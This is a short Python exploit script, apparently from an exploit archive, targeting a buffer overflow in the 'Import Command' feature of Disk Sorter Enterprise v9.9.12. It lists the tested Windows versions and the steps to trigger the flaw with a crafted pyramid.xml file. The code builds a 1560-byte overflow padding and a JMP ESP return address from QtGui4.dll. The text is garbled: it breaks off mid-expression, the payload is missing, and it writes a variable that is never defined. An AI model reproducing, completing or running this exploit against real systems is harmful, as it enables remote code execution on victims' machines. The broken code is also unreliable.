#!/usr/bin/python # Exploit Title : Disk Sorter Enterprise v9.9.12 - 'Import Command' Buffer Overflow # Discovery by : Anurag Srivastava # Email : anurag.srivastava@pyramidcyber.com # Website : www.pyramidcyber.com # Discovery Date : 21/08/2017 # Software Link : http://www.disksorter.com/setups/disksorterent_setup_v9.9.12.exe # Tested Version : 9.9.12 # Tested on OS : Windows 7 Ultimate x64bit and Windows 10 Home Edition x64 # Steps to Reproduce: Run the python file to generate pyramid.xml and then open disk pulse software , right click and click on import command . Select pyramid.xml file . import os,struct #offset to eip junk = "A" * (1560) #JMP ESP (QtGui4.dll) jmp1 = struct.pack('' f = open('pyramid.xml', 'w') f.write(file) f.close()